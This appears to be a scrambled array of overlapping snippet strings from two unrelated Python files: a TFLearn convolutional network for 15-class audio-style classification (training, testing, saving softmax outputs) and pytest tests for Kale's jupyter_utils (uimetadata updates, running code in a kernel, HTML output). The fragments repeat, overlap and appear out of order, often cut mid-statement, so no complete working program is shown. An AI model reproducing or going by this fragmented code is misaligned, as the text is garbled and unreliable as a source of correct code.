"max_pool_2d(self.convnet, 3) self.convnet = tflearn.layers.conv.global_avg_pool(self.convnet) self.convnet = fully_connected(self.convnet, 1024, activation='relu') #self.convnet = dropout(self.convnet,",
"3) self.convnet = tflearn.layers.conv.global_avg_pool(self.convnet) self.convnet = fully_connected(self.convnet, 1024, activation='relu') #self.convnet = dropout(self.convnet, 0.8)",
"range(len(X_test)): self.pr = model.predict([X_test[i]])[0] self.ans.append(self.pr) if(np.array_equal((np.round(self.pr)).astype(int), Y_test[i])): count+=1 print(arg, \"Test Accuracy = \",",
"from the user #here stochastic learning is deployed since the input data is",
"return model def predict_test_data(self, arg, model, X_test, Y_test): self.ans = [] count =",
"0.8) can be used to avoid overfitting self.convnet = fully_connected(self.convnet, 15, activation='softmax') self.convnet",
"activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 256, 5, activation='relu') self.convnet =",
"pass def create_1ConvModel(self): #creating the CNN model as per the architecture followed with",
"followed with 4-conv and pooling layers self.convnet = input_data(shape=[None, 128, 431, 1], name='input')",
"5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = tflearn.layers.conv.global_avg_pool(self.convnet) self.convnet = fully_connected(self.convnet, 1024,",
"test accuracy for each classifier #saving the softmax outputs for using them later",
"epochs model.fit({'input' : X_train}, {'targets' : Y_train}, n_epoch=self.epoch, validation_set=({'input' : X_val}, {'targets' :",
"deployed since the input data is not too high; minibatch_size=1 self.epoch = 10",
"self.model = tflearn.DNN(self.convnet) return self.model def train_1ConvModel(self, arg, model, X_train, Y_train, X_val, Y_val):",
"tflearn.DNN(self.convnet) return self.model def train_1ConvModel(self, arg, model, X_train, Y_train, X_val, Y_val): #training the",
": Y_train}, n_epoch=self.epoch, validation_set=({'input' : X_val}, {'targets' : Y_val}), show_metric=True, run_id='DCNet') model.save('DNN/'+CNN.data_size+'/'+arg+'.model') #saving",
"learning is deployed since the input data is not too high; minibatch_size=1 self.epoch",
"self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 128, 5, activation='relu') self.convnet = max_pool_2d(self.convnet,",
"numpy as np import tensorflow as tf import tflearn from tflearn.layers.conv import conv_2d,",
"self.ans.append(self.pr) if(np.array_equal((np.round(self.pr)).astype(int), Y_test[i])): count+=1 print(arg, \"Test Accuracy = \", (count/len(X_test))*100, \"%\") #calculating test",
"max_pool_2d from tflearn.layers.core import input_data, dropout, fully_connected from tflearn.layers.estimator import regression class CNN():",
"\"%\") #calculating test accuracy for each classifier #saving the softmax outputs for using",
"run_id='DCNet') model.save('DNN/'+CNN.data_size+'/'+arg+'.model') #saving the model in the DNN/full folder, 3 files will be",
"import tensorflow as tf import tflearn from tflearn.layers.conv import conv_2d, max_pool_2d from tflearn.layers.core",
"5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 64, 5, activation='relu') self.convnet",
"conv_2d(self.convnet, 256, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = tflearn.layers.conv.global_avg_pool(self.convnet) self.convnet =",
"= conv_2d(self.convnet, 64, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 128,",
"stochastic learning is deployed since the input data is not too high; minibatch_size=1",
"arg, model, X_train, Y_train, X_val, Y_val): #training the created model with data from",
"#----convolutional neural network for classification------ #importing required libraries and modules import os import",
"Y_val): #training the created model with data from the user #here stochastic learning",
"= model.predict([X_test[i]])[0] self.ans.append(self.pr) if(np.array_equal((np.round(self.pr)).astype(int), Y_test[i])): count+=1 print(arg, \"Test Accuracy = \", (count/len(X_test))*100, \"%\")",
"def create_1ConvModel(self): #creating the CNN model as per the architecture followed with 4-conv",
"Y_train}, n_epoch=self.epoch, validation_set=({'input' : X_val}, {'targets' : Y_val}), show_metric=True, run_id='DCNet') model.save('DNN/'+CNN.data_size+'/'+arg+'.model') #saving the",
"tensorflow as tf import tflearn from tflearn.layers.conv import conv_2d, max_pool_2d from tflearn.layers.core import",
"= dropout(self.convnet, 0.8) can be used to avoid overfitting self.convnet = fully_connected(self.convnet, 15,",
"the architecture followed with 4-conv and pooling layers self.convnet = input_data(shape=[None, 128, 431,",
"4-conv and pooling layers self.convnet = input_data(shape=[None, 128, 431, 1], name='input') self.convnet =",
"fully_connected(self.convnet, 15, activation='softmax') self.convnet = regression(self.convnet, optimizer='adam', learning_rate=0.01, loss='categorical_crossentropy', name='targets') self.model = tflearn.DNN(self.convnet)",
"loss='categorical_crossentropy', name='targets') self.model = tflearn.DNN(self.convnet) return self.model def train_1ConvModel(self, arg, model, X_train, Y_train,",
"Y_val}), show_metric=True, run_id='DCNet') model.save('DNN/'+CNN.data_size+'/'+arg+'.model') #saving the model in the DNN/full folder, 3 files",
"= fully_connected(self.convnet, 1024, activation='relu') #self.convnet = dropout(self.convnet, 0.8) can be used to avoid",
"Y_train, X_val, Y_val): #training the created model with data from the user #here",
"activation='relu') #self.convnet = dropout(self.convnet, 0.8) can be used to avoid overfitting self.convnet =",
"neural network for classification------ #importing required libraries and modules import os import numpy",
"128, 431, 1], name='input') self.convnet = conv_2d(self.convnet, 32, 5, activation='relu') self.convnet = max_pool_2d(self.convnet,",
"model, X_train, Y_train, X_val, Y_val): #training the created model with data from the",
"tflearn.layers.core import input_data, dropout, fully_connected from tflearn.layers.estimator import regression class CNN(): datasize =",
"self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 256, 5, activation='relu') self.convnet = max_pool_2d(self.convnet,",
": X_train}, {'targets' : Y_train}, n_epoch=self.epoch, validation_set=({'input' : X_val}, {'targets' : Y_val}), show_metric=True,",
"X_val}, {'targets' : Y_val}), show_metric=True, run_id='DCNet') model.save('DNN/'+CNN.data_size+'/'+arg+'.model') #saving the model in the DNN/full",
"conv_2d(self.convnet, 32, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 64, 5,",
"#self.convnet = dropout(self.convnet, 0.8) can be used to avoid overfitting self.convnet = fully_connected(self.convnet,",
"= conv_2d(self.convnet, 128, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 256,",
"the DNN/full folder, 3 files will be created for each model return model",
"created for each model return model def predict_test_data(self, arg, model, X_test, Y_test): self.ans",
"= conv_2d(self.convnet, 32, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 64,",
"#saving the softmax outputs for using them later for calculating the ensemble accuracy",
"import numpy as np import tensorflow as tf import tflearn from tflearn.layers.conv import",
"128, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 256, 5, activation='relu')",
"#constructor pass def create_1ConvModel(self): #creating the CNN model as per the architecture followed",
"import tflearn from tflearn.layers.conv import conv_2d, max_pool_2d from tflearn.layers.core import input_data, dropout, fully_connected",
"dropout(self.convnet, 0.8) can be used to avoid overfitting self.convnet = fully_connected(self.convnet, 15, activation='softmax')",
"network for classification------ #importing required libraries and modules import os import numpy as",
"dropout, fully_connected from tflearn.layers.estimator import regression class CNN(): datasize = 'full' def __init__(self):",
"show_metric=True, run_id='DCNet') model.save('DNN/'+CNN.data_size+'/'+arg+'.model') #saving the model in the DNN/full folder, 3 files will",
"from tflearn.layers.estimator import regression class CNN(): datasize = 'full' def __init__(self): #constructor pass",
"the created model with data from the user #here stochastic learning is deployed",
"learning_rate=0.01, loss='categorical_crossentropy', name='targets') self.model = tflearn.DNN(self.convnet) return self.model def train_1ConvModel(self, arg, model, X_train,",
"fully_connected(self.convnet, 1024, activation='relu') #self.convnet = dropout(self.convnet, 0.8) can be used to avoid overfitting",
"fully_connected from tflearn.layers.estimator import regression class CNN(): datasize = 'full' def __init__(self): #constructor",
"= max_pool_2d(self.convnet, 3) self.convnet = tflearn.layers.conv.global_avg_pool(self.convnet) self.convnet = fully_connected(self.convnet, 1024, activation='relu') #self.convnet =",
"name='targets') self.model = tflearn.DNN(self.convnet) return self.model def train_1ConvModel(self, arg, model, X_train, Y_train, X_val,",
"activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 128, 5, activation='relu') self.convnet =",
"of epochs model.fit({'input' : X_train}, {'targets' : Y_train}, n_epoch=self.epoch, validation_set=({'input' : X_val}, {'targets'",
"= 0 for i in range(len(X_test)): self.pr = model.predict([X_test[i]])[0] self.ans.append(self.pr) if(np.array_equal((np.round(self.pr)).astype(int), Y_test[i])): count+=1",
"if(np.array_equal((np.round(self.pr)).astype(int), Y_test[i])): count+=1 print(arg, \"Test Accuracy = \", (count/len(X_test))*100, \"%\") #calculating test accuracy",
"self.convnet = regression(self.convnet, optimizer='adam', learning_rate=0.01, loss='categorical_crossentropy', name='targets') self.model = tflearn.DNN(self.convnet) return self.model def",
"tflearn.layers.conv.global_avg_pool(self.convnet) self.convnet = fully_connected(self.convnet, 1024, activation='relu') #self.convnet = dropout(self.convnet, 0.8) can be used",
"is deployed since the input data is not too high; minibatch_size=1 self.epoch =",
"self.model def train_1ConvModel(self, arg, model, X_train, Y_train, X_val, Y_val): #training the created model",
"and modules import os import numpy as np import tensorflow as tf import",
"overfitting self.convnet = fully_connected(self.convnet, 15, activation='softmax') self.convnet = regression(self.convnet, optimizer='adam', learning_rate=0.01, loss='categorical_crossentropy', name='targets')",
"conv_2d, max_pool_2d from tflearn.layers.core import input_data, dropout, fully_connected from tflearn.layers.estimator import regression class",
"self.convnet = fully_connected(self.convnet, 15, activation='softmax') self.convnet = regression(self.convnet, optimizer='adam', learning_rate=0.01, loss='categorical_crossentropy', name='targets') self.model",
"the number of epochs model.fit({'input' : X_train}, {'targets' : Y_train}, n_epoch=self.epoch, validation_set=({'input' :",
"def __init__(self): #constructor pass def create_1ConvModel(self): #creating the CNN model as per the",
"3) self.convnet = conv_2d(self.convnet, 256, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet =",
"conv_2d(self.convnet, 128, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 256, 5,",
"the user #here stochastic learning is deployed since the input data is not",
"and pooling layers self.convnet = input_data(shape=[None, 128, 431, 1], name='input') self.convnet = conv_2d(self.convnet,",
"model.save('DNN/'+CNN.data_size+'/'+arg+'.model') #saving the model in the DNN/full folder, 3 files will be created",
"the CNN model as per the architecture followed with 4-conv and pooling layers",
"model, X_test, Y_test): self.ans = [] count = 0 for i in range(len(X_test)):",
"import os import numpy as np import tensorflow as tf import tflearn from",
"max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 128, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet",
"with 4-conv and pooling layers self.convnet = input_data(shape=[None, 128, 431, 1], name='input') self.convnet",
"CNN model as per the architecture followed with 4-conv and pooling layers self.convnet",
"256, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = tflearn.layers.conv.global_avg_pool(self.convnet) self.convnet = fully_connected(self.convnet,",
"high; minibatch_size=1 self.epoch = 10 #set the number of epochs model.fit({'input' : X_train},",
"tflearn.layers.conv import conv_2d, max_pool_2d from tflearn.layers.core import input_data, dropout, fully_connected from tflearn.layers.estimator import",
"self.convnet = tflearn.layers.conv.global_avg_pool(self.convnet) self.convnet = fully_connected(self.convnet, 1024, activation='relu') #self.convnet = dropout(self.convnet, 0.8) can",
"regression(self.convnet, optimizer='adam', learning_rate=0.01, loss='categorical_crossentropy', name='targets') self.model = tflearn.DNN(self.convnet) return self.model def train_1ConvModel(self, arg,",
"is not too high; minibatch_size=1 self.epoch = 10 #set the number of epochs",
"{'targets' : Y_val}), show_metric=True, run_id='DCNet') model.save('DNN/'+CNN.data_size+'/'+arg+'.model') #saving the model in the DNN/full folder,",
"0 for i in range(len(X_test)): self.pr = model.predict([X_test[i]])[0] self.ans.append(self.pr) if(np.array_equal((np.round(self.pr)).astype(int), Y_test[i])): count+=1 print(arg,",
"since the input data is not too high; minibatch_size=1 self.epoch = 10 #set",
"self.ans = [] count = 0 for i in range(len(X_test)): self.pr = model.predict([X_test[i]])[0]",
"too high; minibatch_size=1 self.epoch = 10 #set the number of epochs model.fit({'input' :",
": X_val}, {'targets' : Y_val}), show_metric=True, run_id='DCNet') model.save('DNN/'+CNN.data_size+'/'+arg+'.model') #saving the model in the",
"input_data, dropout, fully_connected from tflearn.layers.estimator import regression class CNN(): datasize = 'full' def",
"15, activation='softmax') self.convnet = regression(self.convnet, optimizer='adam', learning_rate=0.01, loss='categorical_crossentropy', name='targets') self.model = tflearn.DNN(self.convnet) return",
"= tflearn.DNN(self.convnet) return self.model def train_1ConvModel(self, arg, model, X_train, Y_train, X_val, Y_val): #training",
"= max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 256, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3)",
"created model with data from the user #here stochastic learning is deployed since",
"will be created for each model return model def predict_test_data(self, arg, model, X_test,",
"used to avoid overfitting self.convnet = fully_connected(self.convnet, 15, activation='softmax') self.convnet = regression(self.convnet, optimizer='adam',",
"import conv_2d, max_pool_2d from tflearn.layers.core import input_data, dropout, fully_connected from tflearn.layers.estimator import regression",
"self.convnet = conv_2d(self.convnet, 128, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet,",
"required libraries and modules import os import numpy as np import tensorflow as",
"count+=1 print(arg, \"Test Accuracy = \", (count/len(X_test))*100, \"%\") #calculating test accuracy for each",
"for each classifier #saving the softmax outputs for using them later for calculating",
"as tf import tflearn from tflearn.layers.conv import conv_2d, max_pool_2d from tflearn.layers.core import input_data,",
"= 10 #set the number of epochs model.fit({'input' : X_train}, {'targets' : Y_train},",
"the softmax outputs for using them later for calculating the ensemble accuracy np.save('test_prediction/full/'+arg+'.npy',",
"the input data is not too high; minibatch_size=1 self.epoch = 10 #set the",
"from tflearn.layers.conv import conv_2d, max_pool_2d from tflearn.layers.core import input_data, dropout, fully_connected from tflearn.layers.estimator",
"model return model def predict_test_data(self, arg, model, X_test, Y_test): self.ans = [] count",
"regression class CNN(): datasize = 'full' def __init__(self): #constructor pass def create_1ConvModel(self): #creating",
"model def predict_test_data(self, arg, model, X_test, Y_test): self.ans = [] count = 0",
"self.convnet = conv_2d(self.convnet, 256, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = tflearn.layers.conv.global_avg_pool(self.convnet)",
"model with data from the user #here stochastic learning is deployed since the",
"1], name='input') self.convnet = conv_2d(self.convnet, 32, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet",
"for each model return model def predict_test_data(self, arg, model, X_test, Y_test): self.ans =",
"per the architecture followed with 4-conv and pooling layers self.convnet = input_data(shape=[None, 128,",
"= \", (count/len(X_test))*100, \"%\") #calculating test accuracy for each classifier #saving the softmax",
"X_test, Y_test): self.ans = [] count = 0 for i in range(len(X_test)): self.pr",
"layers self.convnet = input_data(shape=[None, 128, 431, 1], name='input') self.convnet = conv_2d(self.convnet, 32, 5,",
"in range(len(X_test)): self.pr = model.predict([X_test[i]])[0] self.ans.append(self.pr) if(np.array_equal((np.round(self.pr)).astype(int), Y_test[i])): count+=1 print(arg, \"Test Accuracy =",
"print(arg, \"Test Accuracy = \", (count/len(X_test))*100, \"%\") #calculating test accuracy for each classifier",
"with data from the user #here stochastic learning is deployed since the input",
"conv_2d(self.convnet, 64, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 128, 5,",
"os import numpy as np import tensorflow as tf import tflearn from tflearn.layers.conv",
"minibatch_size=1 self.epoch = 10 #set the number of epochs model.fit({'input' : X_train}, {'targets'",
"model in the DNN/full folder, 3 files will be created for each model",
"datasize = 'full' def __init__(self): #constructor pass def create_1ConvModel(self): #creating the CNN model",
"tflearn.layers.estimator import regression class CNN(): datasize = 'full' def __init__(self): #constructor pass def",
"np import tensorflow as tf import tflearn from tflearn.layers.conv import conv_2d, max_pool_2d from",
"def train_1ConvModel(self, arg, model, X_train, Y_train, X_val, Y_val): #training the created model with",
"return self.model def train_1ConvModel(self, arg, model, X_train, Y_train, X_val, Y_val): #training the created",
"class CNN(): datasize = 'full' def __init__(self): #constructor pass def create_1ConvModel(self): #creating the",
": Y_val}), show_metric=True, run_id='DCNet') model.save('DNN/'+CNN.data_size+'/'+arg+'.model') #saving the model in the DNN/full folder, 3",
"431, 1], name='input') self.convnet = conv_2d(self.convnet, 32, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3)",
"self.convnet = conv_2d(self.convnet, 32, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet,",
"classification------ #importing required libraries and modules import os import numpy as np import",
"user #here stochastic learning is deployed since the input data is not too",
"[] count = 0 for i in range(len(X_test)): self.pr = model.predict([X_test[i]])[0] self.ans.append(self.pr) if(np.array_equal((np.round(self.pr)).astype(int),",
"self.pr = model.predict([X_test[i]])[0] self.ans.append(self.pr) if(np.array_equal((np.round(self.pr)).astype(int), Y_test[i])): count+=1 print(arg, \"Test Accuracy = \", (count/len(X_test))*100,",
"Y_test[i])): count+=1 print(arg, \"Test Accuracy = \", (count/len(X_test))*100, \"%\") #calculating test accuracy for",
"1024, activation='relu') #self.convnet = dropout(self.convnet, 0.8) can be used to avoid overfitting self.convnet",
"n_epoch=self.epoch, validation_set=({'input' : X_val}, {'targets' : Y_val}), show_metric=True, run_id='DCNet') model.save('DNN/'+CNN.data_size+'/'+arg+'.model') #saving the model",
"import regression class CNN(): datasize = 'full' def __init__(self): #constructor pass def create_1ConvModel(self):",
"#saving the model in the DNN/full folder, 3 files will be created for",
"data from the user #here stochastic learning is deployed since the input data",
"from tflearn.layers.core import input_data, dropout, fully_connected from tflearn.layers.estimator import regression class CNN(): datasize",
"as np import tensorflow as tf import tflearn from tflearn.layers.conv import conv_2d, max_pool_2d"
] |
[
"-*- coding: utf-8 -*- # @Time : 2019/4/22 14:57 # @Author : hyy",
"utf-8 -*- # @Time : 2019/4/22 14:57 # @Author : hyy # @Email",
"as e: print('Download error:', e.reason) html = None if num_retries > 0: if",
"print('Download error:', e.reason) html = None if num_retries > 0: if hasattr(e, 'code')",
"PyCharm import urllib.request def download(url, num_retries = 2): print('Downloading:',url) headers = {'User-agent' :",
"coding: utf-8 -*- # @Time : 2019/4/22 14:57 # @Author : hyy #",
"Gecko/20100101 Firefox/66.0'} request = urllib.request.Request(url, headers=headers) try: html = urllib.request.urlopen(request).read() except urllib.request.URLError as",
"# @File : lea_1.py # @Software: PyCharm import urllib.request def download(url, num_retries =",
"= 2): print('Downloading:',url) headers = {'User-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64;",
"Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'} request = urllib.request.Request(url, headers=headers) try: html = urllib.request.urlopen(request).read()",
"'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'} request = urllib.request.Request(url, headers=headers)",
"# @Email : <EMAIL> # @File : lea_1.py # @Software: PyCharm import urllib.request",
"(Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'} request = urllib.request.Request(url, headers=headers) try:",
"= urllib.request.Request(url, headers=headers) try: html = urllib.request.urlopen(request).read() except urllib.request.URLError as e: print('Download error:',",
"= urllib.request.urlopen(request).read() except urllib.request.URLError as e: print('Download error:', e.reason) html = None if",
"@Email : <EMAIL> # @File : lea_1.py # @Software: PyCharm import urllib.request def",
"Firefox/66.0'} request = urllib.request.Request(url, headers=headers) try: html = urllib.request.urlopen(request).read() except urllib.request.URLError as e:",
"import urllib.request def download(url, num_retries = 2): print('Downloading:',url) headers = {'User-agent' : 'Mozilla/5.0",
"600: return download(url, num_retries-1) return html if __name__ == '__main__': html = download('http://httpstat.us/500')",
"@File : lea_1.py # @Software: PyCharm import urllib.request def download(url, num_retries = 2):",
"e.code < 600: return download(url, num_retries-1) return html if __name__ == '__main__': html",
"error:', e.reason) html = None if num_retries > 0: if hasattr(e, 'code') and",
"if hasattr(e, 'code') and 500 <= e.code < 600: return download(url, num_retries-1) return",
": lea_1.py # @Software: PyCharm import urllib.request def download(url, num_retries = 2): print('Downloading:',url)",
"num_retries > 0: if hasattr(e, 'code') and 500 <= e.code < 600: return",
"> 0: if hasattr(e, 'code') and 500 <= e.code < 600: return download(url,",
"# @Author : hyy # @Email : <EMAIL> # @File : lea_1.py #",
"lea_1.py # @Software: PyCharm import urllib.request def download(url, num_retries = 2): print('Downloading:',url) headers",
"hyy # @Email : <EMAIL> # @File : lea_1.py # @Software: PyCharm import",
": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'} request = urllib.request.Request(url,",
"try: html = urllib.request.urlopen(request).read() except urllib.request.URLError as e: print('Download error:', e.reason) html =",
"0: if hasattr(e, 'code') and 500 <= e.code < 600: return download(url, num_retries-1)",
"e.reason) html = None if num_retries > 0: if hasattr(e, 'code') and 500",
"10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'} request = urllib.request.Request(url, headers=headers) try: html =",
"headers=headers) try: html = urllib.request.urlopen(request).read() except urllib.request.URLError as e: print('Download error:', e.reason) html",
"= None if num_retries > 0: if hasattr(e, 'code') and 500 <= e.code",
"# @Time : 2019/4/22 14:57 # @Author : hyy # @Email : <EMAIL>",
"< 600: return download(url, num_retries-1) return html if __name__ == '__main__': html =",
"html = urllib.request.urlopen(request).read() except urllib.request.URLError as e: print('Download error:', e.reason) html = None",
"e: print('Download error:', e.reason) html = None if num_retries > 0: if hasattr(e,",
"download(url, num_retries = 2): print('Downloading:',url) headers = {'User-agent' : 'Mozilla/5.0 (Windows NT 10.0;",
"urllib.request.urlopen(request).read() except urllib.request.URLError as e: print('Download error:', e.reason) html = None if num_retries",
"@Time : 2019/4/22 14:57 # @Author : hyy # @Email : <EMAIL> #",
"NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'} request = urllib.request.Request(url, headers=headers) try: html",
"request = urllib.request.Request(url, headers=headers) try: html = urllib.request.urlopen(request).read() except urllib.request.URLError as e: print('Download",
"print('Downloading:',url) headers = {'User-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101",
"2): print('Downloading:',url) headers = {'User-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0)",
"urllib.request.Request(url, headers=headers) try: html = urllib.request.urlopen(request).read() except urllib.request.URLError as e: print('Download error:', e.reason)",
"@Author : hyy # @Email : <EMAIL> # @File : lea_1.py # @Software:",
"@Software: PyCharm import urllib.request def download(url, num_retries = 2): print('Downloading:',url) headers = {'User-agent'",
"urllib.request.URLError as e: print('Download error:', e.reason) html = None if num_retries > 0:",
"and 500 <= e.code < 600: return download(url, num_retries-1) return html if __name__",
"x64; rv:66.0) Gecko/20100101 Firefox/66.0'} request = urllib.request.Request(url, headers=headers) try: html = urllib.request.urlopen(request).read() except",
"2019/4/22 14:57 # @Author : hyy # @Email : <EMAIL> # @File :",
"# -*- coding: utf-8 -*- # @Time : 2019/4/22 14:57 # @Author :",
"-*- # @Time : 2019/4/22 14:57 # @Author : hyy # @Email :",
": 2019/4/22 14:57 # @Author : hyy # @Email : <EMAIL> # @File",
"<EMAIL> # @File : lea_1.py # @Software: PyCharm import urllib.request def download(url, num_retries",
"= {'User-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'} request",
"None if num_retries > 0: if hasattr(e, 'code') and 500 <= e.code <",
"def download(url, num_retries = 2): print('Downloading:',url) headers = {'User-agent' : 'Mozilla/5.0 (Windows NT",
"{'User-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'} request =",
"hasattr(e, 'code') and 500 <= e.code < 600: return download(url, num_retries-1) return html",
"num_retries = 2): print('Downloading:',url) headers = {'User-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64;",
"rv:66.0) Gecko/20100101 Firefox/66.0'} request = urllib.request.Request(url, headers=headers) try: html = urllib.request.urlopen(request).read() except urllib.request.URLError",
"html = None if num_retries > 0: if hasattr(e, 'code') and 500 <=",
": hyy # @Email : <EMAIL> # @File : lea_1.py # @Software: PyCharm",
"<= e.code < 600: return download(url, num_retries-1) return html if __name__ == '__main__':",
": <EMAIL> # @File : lea_1.py # @Software: PyCharm import urllib.request def download(url,",
"14:57 # @Author : hyy # @Email : <EMAIL> # @File : lea_1.py",
"urllib.request def download(url, num_retries = 2): print('Downloading:',url) headers = {'User-agent' : 'Mozilla/5.0 (Windows",
"500 <= e.code < 600: return download(url, num_retries-1) return html if __name__ ==",
"# @Software: PyCharm import urllib.request def download(url, num_retries = 2): print('Downloading:',url) headers =",
"except urllib.request.URLError as e: print('Download error:', e.reason) html = None if num_retries >",
"headers = {'User-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'}",
"'code') and 500 <= e.code < 600: return download(url, num_retries-1) return html if",
"if num_retries > 0: if hasattr(e, 'code') and 500 <= e.code < 600:"
] |
[
"target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code(): \"\"\"Test that Python code runs inside",
"KIND, either express or implied. # See the License for the specific language",
"Unless required by applicable law or agreed to in writing, software # distributed",
"`data` must be a list return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([],",
"been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type': 'web-app', 'storage':",
"'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), #",
"'markdown', 'storage': 'inline', 'source': '#Some markdown' } base = {\"outputs\": [markdown]} filepath =",
"and # limitations under the License. import os import json import pytest from",
"test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value =",
"= 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) #",
"x) def test_run_code(): \"\"\"Test that Python code runs inside a jupyter kernel successfully.\"\"\"",
"this file except in compliance with the License. # You may obtain a",
"'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def",
"a list return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # ---",
"that Python code runs inside a jupyter kernel successfully.\"\"\" # test standard code",
"{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs',",
"(_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation from cell",
"x: x) def test_run_code(): \"\"\"Test that Python code runs inside a jupyter kernel",
"ANY KIND, either express or implied. # See the License for the specific",
"{\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file",
"pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath)",
"code runs inside a jupyter kernel successfully.\"\"\" # test standard code code =",
"tmpdir): \"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod'",
"import mock from kale.utils import jupyter_utils as ju def _output_display(data): # `data` must",
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See",
"updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' #",
"(\"a = 3\\nprint(a)\", ) ju.run_code(code) # test magic command code = (\"%%time\\nprint('Some dull",
"'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check",
"json import pytest from testfixtures import mock from kale.utils import jupyter_utils as ju",
"updated = json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'",
"# update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated correctly",
"IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or",
"is created when it does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns'",
"'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir):",
"updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is",
"be a list return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), #",
"from testfixtures import mock from kale.utils import jupyter_utils as ju def _output_display(data): #",
